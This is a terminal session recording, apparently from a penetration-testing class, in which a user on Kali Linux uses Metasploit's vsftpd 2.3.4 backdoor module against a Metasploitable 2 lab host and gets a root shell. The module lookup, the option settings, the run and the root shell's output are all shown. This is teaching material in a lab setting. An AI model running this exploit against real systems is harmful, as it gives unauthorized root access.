[672.967146, "o", "Services\r\n========\r\n\r\nhost          port   proto  name         state  info\r\n----          ----   -----  ----         -----  ----\r\n192.168.3.20  21     tcp    ftp          open   vsftpd 2.3.4\r\n192.168.3.20  22     tcp    ssh          open   OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0\r\n192.168.3.20  23     tcp    telnet       open   Linux telnetd\r\n192.168.3.20  25     tcp    smtp         open   Postfix smtpd\r\n192.168.3.20  53     tcp    domain       open   ISC BIND 9.4.2\r\n192.168.3.20  80     tcp    http         open   Apache httpd 2.2.8 (Ubuntu) DAV/2\r\n192.168.3.20  111    tcp    rpcbind      open   2 RPC #100000\r\n192.168.3.20  139    tcp    netbios-ssn  open   Samba smbd 3.X - 4.X workgroup: WORKGROUP\r\n192.168.3.20  445    tcp    netbios-ssn  open   Samba smbd 3.0.20-Debian workgroup: WORKGROUP\r\n192.168.3.20  512    tcp    exec         open   netkit-rsh rexecd\r\n192.168.3.20  513    tcp    login        open\r\n192.168.3.20  514    tcp    shell        open   Netkit rshd\r\n192.168.3.20  1099   tcp    java-rmi     open   GNU Classpath grmiregistry\r\n192.168.3.20  1524   tcp    bindshell    open   Metasploitable root shell\r\n192.168.3.20  2049   tcp    nfs          open   2-4 RPC #100003\r\n192.168.3.20  2121   tcp    ftp          open   ProFTPD 1.3.1\r\n192.168.3.20  3306   tcp    mysql        open   MySQL 5.0.51a-3ubuntu5\r\n192.168.3.20  3632   tcp    distccd      open   distccd v1 (GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4)\r\n192.168.3.20  5432   tcp    postgresql   open   PostgreSQL DB 8.3.0 - 8.3.7\r\n192.168.3.20  5900   tcp    vnc          open   VNC protocol 3.3\r\n192.168.3.20  6000   tcp    x11          open   access denied\r\n192.168.3.20  6667   tcp    irc          open   UnrealIRCd\r\n192.168.3.20  6697   tcp    irc          open   UnrealIRCd\r\n192.168.3.20  8009   tcp    ajp13        open   Apache Jserv Protocol v1.3\r\n192.168.3.20  8180   tcp    http         open   Apache Tomcat/Coyote JSP engine 1.1\r\n192.168.3.20  8787   tcp    drb          open   Ruby DRb RMI Ruby 1.8; path /usr/lib/ruby/1.8/drb\r\n192.168.3.20  33009  tcp    nlockmgr     open   1-4 RPC #100021\r\n192.168.3.20  41391  tcp    status       open   1 RPC #100024\r\n192.168.3.20  57761  tcp    java-rmi     open   GNU Classpath grmiregistry\r\n192.168.3.20  59079  tcp    mountd       open   1-3 RPC #100005\r\n\r\n"]
[673.053122, "o", "\u001b[4mmsf6\u001b[0m \u001b[0m> "]
[675.640025, "o", "s"]
[675.756841, "o", "e"]
[675.936615, "o", "a"]
[676.038592, "o", "r"]
[676.219076, "o", "c"]
[676.321329, "o", "h"]
[676.567542, "o", " "]
[676.795665, "o", "v"]
[676.987337, "o", "s"]
[677.637837, "o", "f"]
[677.928064, "o", "t"]
[678.108548, "o", "p"]
[678.318598, "o", "d"]
[678.672295, "o", "\r\r\n"]
[678.690805, "o", "\u001b[0m"]
[679.021219, "o", "\r\nMatching Modules\r\n================\r\n\r\n   #  Name                                  Disclosure Date  Rank       Check  Description\r\n   -  ----                                  ---------------  ----       -----  -----------\r\n   0  auxiliary/dos/ftp/\u001b[45mvsftpd\u001b[0m_232          2011-02-03       normal     Yes    \u001b[45mVSFTPD\u001b[0m 2.3.2 Denial of Service\r\n   1  exploit/unix/ftp/\u001b[45mvsftpd\u001b[0m_234_backdoor  2011-07-03       \u001b[32mexcellent\u001b[0m  No     \u001b[45mVSFTPD\u001b[0m v2.3.4 Backdoor Command Execution\r\n\r\n\r\n"]
[679.021402, "o", "Interact with a module by name or index. For example \u001b[32minfo 1\u001b[0m, \u001b[32muse 1\u001b[0m or \u001b[32muse exploit/unix/ftp/vsftpd_234_backdoor\u001b[0m\r\n\r\n"]
[679.110179, "o", "\u001b[4mmsf6\u001b[0m \u001b[0m> "]
[682.662928, "o", "i"]
[682.778881, "o", "n"]
[682.878729, "o", "f"]
[682.983764, "o", "i"]
[683.490405, "o", "\b\u001b[K"]
[683.703762, "o", "o"]
[683.951131, "o", " "]
[684.495666, "o", "1"]
[684.967935, "o", "\r\r\n"]
[684.98987, "o", "\u001b[0m"]
[685.073199, "o", "\r\n       Name: VSFTPD v2.3.4 Backdoor Command Execution\r\n     Module: exploit/unix/ftp/vsftpd_234_backdoor\r\n   Platform: Unix\r\n       Arch: cmd\r\n Privileged: Yes\r\n    License: Metasploit Framework License (BSD)\r\n       Rank: Excellent\r\n  Disclosed: 2011-07-03\r\n\r\nProvided by:\r\n  hdm <x@hdm.io>\r\n  MC <mc@metasploit.com>\r\n\r\nAvailable targets:\r\n      Id  Name\r\n      --  ----\r\n  =>  0   Automatic\r\n\r\nCheck supported:\r\n  No\r\n\r\nBasic options:\r\n  Name    Current Setting  Required  Description\r\n  ----    ---------------  --------  -----------\r\n  RHOSTS                   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/u\r\n                                     sing-metasploit.html\r\n  RPORT   21               yes       The target port (TCP)\r\n\r\nPayload information:\r\n  Space: 2000\r\n  Avoid: 0 characters\r\n\r\nDescription:\r\n  This module exploits a malicious backdoor that was added to the\tVSFTPD download\r\n  archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between\r\n  June 30th 2011 and July 1st 2011 according to the most recent information\r\n  available. This backdoor was removed on July 3rd 2011.\r\n\r\nReferences:\r\n  OSVDB (73573)\r\n  http://pastebin.com/AetT9sS5\r\n  http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html\r\n\r\n"]
[685.073671, "o", "\r\nView the full module info with the \u001b[32minfo -d\u001b[0m command.\r\n\r\n"]
[685.197781, "o", "\u001b[4mmsf6\u001b[0m \u001b[0m> "]
[691.371109, "o", "u"]
[691.41548, "o", "s"]
[691.446199, "o", "e"]
[691.870344, "o", " "]
[693.194555, "o", "e"]
[693.363018, "o", "x"]
[693.427819, "o", "p"]
[693.655401, "o", "l"]
[693.836228, "o", "o"]
[693.902858, "o", "i"]
[693.925433, "o", "t"]
[694.545926, "o", "/"]
[695.321217, "o", "u"]
[695.543153, "o", "n"]
[695.688016, "o", "i"]
[695.715033, "o", "x"]
[696.072672, "o", "/"]
[696.747569, "o", "f"]
[696.988808, "o", "t"]
[697.379237, "o", "p"]
[698.064449, "o", "/"]
[699.062605, "o", "v"]
[699.28053, "o", "s"]
[699.540389, "o", "f"]
[699.825884, "o", "t"]
[700.167949, "o", "p"]
[700.813482, "o", "d"]
[701.743591, "o", "_"]
[702.23191, "o", "2"]
[702.298992, "o", "3"]
[702.343082, "o", "4"]
[702.766764, "o", "_"]
[703.184091, "o", "b"]
[703.263134, "o", "a"]
[703.489872, "o", "c"]
[703.580585, "o", "k"]
[703.824671, "o", "f"]
[704.164982, "o", "\b\u001b[K"]
[704.219321, "o", "d"]
[704.375206, "o", "o"]
[704.524875, "o", "o"]
[704.625075, "o", "r"]
[705.047571, "o", "\r\r\n"]
[705.069441, "o", "\u001b[0m"]
[705.429166, "o", "\u001b[1m\u001b[34m[*]\u001b[0m No payload configured, defaulting to cmd/unix/interact\r\n"]
[705.530379, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31munix/ftp/vsftpd_234_backdoor\u001b[0m) \u001b[0m> "]
[708.461563, "o", "s"]
[708.575365, "o", "h"]
[708.711639, "o", "o"]
[708.762981, "o", "w"]
[708.860089, "o", " "]
[709.639634, "o", "o"]
[709.74697, "o", "p"]
[709.84467, "o", "t"]
[709.943014, "o", "i"]
[710.078739, "o", "n"]
[710.099108, "o", "o"]
[710.972123, "o", "\b\u001b[K"]
[711.094397, "o", "\b\u001b[K"]
[711.309031, "o", "o"]
[711.364475, "o", "n"]
[711.418275, "o", "s"]
[711.790951, "o", "\r\r\n"]
[711.819273, "o", "\u001b[0m"]
[711.860108, "o", "\r\nModule options (exploit/unix/ftp/vsftpd_234_backdoor):\r\n\r\n   Name     Current Setting  Required  Description\r\n   ----     ---------------  --------  -----------\r\n   CHOST                     no        The local client address\r\n   CPORT                     no        The local client port\r\n   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]\r\n   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics\r\n                                       /using-metasploit.html\r\n   RPORT    21               yes       The target port (TCP)\r\n\r\n"]
[711.887572, "o", "\r\nExploit target:\r\n\r\n   Id  Name\r\n   --  ----\r\n   0   Automatic\r\n\r\n\r\n"]
[711.89451, "o", "\r\nView the full module info with the \u001b[32minfo\u001b[0m, or \u001b[32minfo -d\u001b[0m command.\r\n\r\n"]
[712.026996, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31munix/ftp/vsftpd_234_backdoor\u001b[0m) \u001b[0m> "]
[714.301915, "o", "s"]
[714.467519, "o", "e"]
[714.506905, "o", "t"]
[714.65312, "o", " "]
[714.951851, "o", "r"]
[715.363272, "o", "h"]
[715.587233, "o", "o"]
[715.652866, "o", "s"]
[715.703483, "o", "t"]
[716.058127, "o", " "]
[716.228336, "o", "m"]
[716.41557, "o", "s"]
[716.63624, "o", "f"]
[716.846079, "o", "t"]
[717.113141, "o", "2"]
[717.511348, "o", "\b\u001b[K"]
[717.640599, "o", "\b\u001b[K"]
[717.728397, "o", "2"]
[717.890525, "o", "."]
[717.96937, "o", "t"]
[718.12471, "o", "e"]
[718.237421, "o", "s"]
[718.402652, "o", "t"]
[720.235962, "o", "\r\r\n"]
[720.259432, "o", "\u001b[0m"]
[720.279253, "o", "rhost => msf2.test\r\n"]
[720.381179, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31munix/ftp/vsftpd_234_backdoor\u001b[0m) \u001b[0m> "]
[721.07725, "o", "s"]
[721.184724, "o", "h"]
[721.346295, "o", "o"]
[721.410846, "o", "w"]
[722.051899, "o", " "]
[722.253657, "o", "u"]
[722.332842, "o", "p"]
[722.661434, "o", "\b\u001b[K"]
[722.790563, "o", "\b\u001b[K"]
[723.008418, "o", "o"]
[723.100228, "o", "p"]
[723.280443, "o", "t"]
[723.362553, "o", "i"]
[723.435813, "o", "o"]
[723.533592, "o", "n"]
[723.635338, "o", "s"]
[724.12104, "o", "\r\r\n"]
[724.14169, "o", "\u001b[0m"]
[724.172009, "o", "\r\nModule options (exploit/unix/ftp/vsftpd_234_backdoor):\r\n\r\n   Name     Current Setting  Required  Description\r\n   ----     ---------------  --------  -----------\r\n   CHOST                     no        The local client address\r\n   CPORT                     no        The local client port\r\n   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]\r\n   RHOSTS   msf2.test        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics\r\n                                       /using-metasploit.html\r\n   RPORT    21               yes       The target port (TCP)\r\n\r\n"]
[724.186925, "o", "\r\nExploit target:\r\n\r\n   Id  Name\r\n   --  ----\r\n   0   Automatic\r\n\r\n\r\n"]
[724.191592, "o", "\r\nView the full module info with the \u001b[32minfo\u001b[0m, or \u001b[32minfo -d\u001b[0m command.\r\n\r\n"]
[724.312687, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31munix/ftp/vsftpd_234_backdoor\u001b[0m) \u001b[0m> "]
[727.925906, "o", "r"]
[728.038232, "o", "u"]
[728.239544, "o", "n"]
[732.189112, "o", "\r\r\n"]
[732.213559, "o", "\u001b[0m"]
[732.64952, "o", "\r\n"]
[732.649896, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 192.168.3.20:21 - Banner: 220 (vsFTPd 2.3.4)\r\n"]
[732.653161, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 192.168.3.20:21 - USER: 331 Please specify the password.\r\n"]
[732.657391, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 192.168.3.20:21 - Backdoor service has been spawned, handling...\r\n"]
[732.663169, "o", "\u001b[1m\u001b[32m[+]\u001b[0m 192.168.3.20:21 - UID: uid=0(root) gid=0(root)\r\n"]
[736.27296, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Found shell.\r\n"]
[742.815369, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Command shell session 1 opened (192.168.3.10:36621 -> 192.168.3.20:6200) at 2024-09-29 11:24:34 -0400\r\n"]
[742.828423, "o", "\r\n"]
[742.828964, "o", "\u001b[0m"]
[749.762147, "o", "\r\n"]
[751.841359, "o", "h"]
[751.914377, "o", "e"]
[752.080982, "o", "l"]
[752.23308, "o", "l"]
[752.45844, "o", "o"]
[752.710298, "o", "\r\n"]
[752.765506, "o", "sh: line 7: hello: command not found\r\n"]
[757.973297, "o", "i"]
[758.017856, "o", "d"]
[758.234571, "o", "\r\n"]
[758.292277, "o", "uid=0(root) gid=0(root)\r\n"]
[759.889141, "o", "l"]
[759.944416, "o", "s"]
[760.130755, "o", "\r\n"]
[760.196434, "o", "bin\r\nboot\r\ncdrom\r\ndev\r\netc\r\nhome\r\ninitrd\r\ninitrd.img\r\nlib\r\nlost+found\r\nmedia\r\nmnt\r\nnohup.out\r\nopt\r\nproc\r\nroot\r\nsbin\r\nsrv\r\nsys\r\ntmp\r\nusr\r\nvar\r\nvmlinuz\r\n"]
[765.154788, "o", "w"]
[765.252451, "o", "h"]
[765.419122, "o", "i"]
[765.566002, "o", "c"]
[765.661003, "o", "h"]
[766.056405, "o", " "]
[766.554539, "o", "b"]
[767.190613, "o", "a"]
[767.374214, "o", "s"]
[767.602197, "o", "h"]
[770.794764, "o", "\r\n"]
[770.836697, "o", "/bin/bash\r\n"]
[771.704132, "o", "w"]
[771.777312, "o", "h"]
[771.936561, "o", "i"]
[772.067164, "o", "c"]
[772.144299, "o", "h"]
[772.271547, "o", " "]
[772.468196, "o", "s"]
[772.553849, "o", "h"]
[772.79231, "o", "\r\n"]
[772.840076, "o", "/bin/sh\r\n"]
[777.483817, "o", "s"]
[777.574428, "o", "h"]
[778.190784, "o", "\r\n"]
[779.557117, "o", "\r\n"]
[779.724316, "o", "\r\n"]
[779.898685, "o", "\r\n"]
[781.191653, "o", "i"]
[781.256172, "o", "d"]
[781.45161, "o", "\r\n"]
[781.497723, "o", "uid=0(root) gid=0(root)\r\n"]
[782.259934, "o", "e"]
[782.407372, "o", "x"]
[782.478501, "o", "i"]
[782.637023, "o", "t"]
[783.022952, "o", "\r\n"]
[784.576881, "o", "i"]
[784.644682, "o", "d"]
[784.821164, "o", "\r\n"]
[784.866681, "o", "uid=0(root) gid=0(root)\r\n"]
[785.362611, "o", "p"]
[785.449489, "o", "w"]
[785.510185, "o", "d"]
[785.643249, "o", "\r\n"]
[785.689039, "o", "/\r\n"]
[797.340659, "o", "e"]
[797.606071, "o", "x"]
[797.71647, "o", "i"]
[797.796382, "o", "t"]
[798.029542, "o", "\r\n"]
[798.08211, "o", "\u001b[1m\u001b[34m[*]\u001b[0m 192.168.3.20 - Command shell session 1 closed.\r\n"]
[798.170101, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31munix/ftp/vsftpd_234_backdoor\u001b[0m) \u001b[0m> "]
[800.840946, "o", "r"]
[800.916646, "o", "e"]
[801.05885, "o", "t"]
[801.193802, "o", "u"]
[801.277772, "o", "r"]
[801.394386, "o", "n"]
[802.896089, "o", "\r\r\n"]
[802.918177, "o", "\u001b[0m"]
[802.922113, "o", "\u001b[1m\u001b[31m[-]\u001b[0m Unknown command: return. Did you mean \u001b[32mrerun\u001b[0m? Run the \u001b[32mhelp\u001b[0m command for more details.\r\n"]
[803.008349, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31munix/ftp/vsftpd_234_backdoor\u001b[0m) \u001b[0m> "]
[806.077437, "o", "u"]
[806.11912, "o", "p"]
[806.509174, "o", "\r\r\n"]
[806.531494, "o", "\u001b[0m"]
[806.533652, "o", "\u001b[1m\u001b[31m[-]\u001b[0m Unknown command: up. Run the \u001b[32mhelp\u001b[0m command for more details.\r\n"]
[806.626591, "o", "\u001b[4mmsf6\u001b[0m exploit(\u001b[1m\u001b[31munix/ftp/vsftpd_234_backdoor\u001b[0m) \u001b[0m> "]
[807.552812, "o", "b"]
[807.653852, "o", "a"]
[808.168169, "o", "c"]
[808.168521, "o", "k"]
[808.306688, "o", "\r\r\n"]
[808.339932, "o", "\u001b[0m"]
[808.545043, "o", "\u001b[4mmsf6\u001b[0m \u001b[0m> "]
[812.333216, "o", "\u001b[0m"]
[812.769799, "o", "                                                                                                                         \r\r"]
[812.770114, "o", "\u001b]0;kali@kali: ~/seance06\u0007\r\n"]
[812.802733, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[32m┌──(\u001b[1m\u001b[32m\u001b[34mkali㉿kali\u001b[0m\u001b[34m\u001b[32m)-[\u001b[1m\u001b[32m\u001b[39m~/seance06\u001b[0m\u001b[32m]\r\n└─\u001b[1m\u001b[32m\u001b[34m$\u001b[0m\u001b[34m\u001b[39m \u001b[K"]
[812.803001, "o", "\u001b[?1h\u001b="]
[812.805209, "o", "\u001b[?2004h"]
[814.289721, "o", "\u001b[?2004l\r\r\n"]
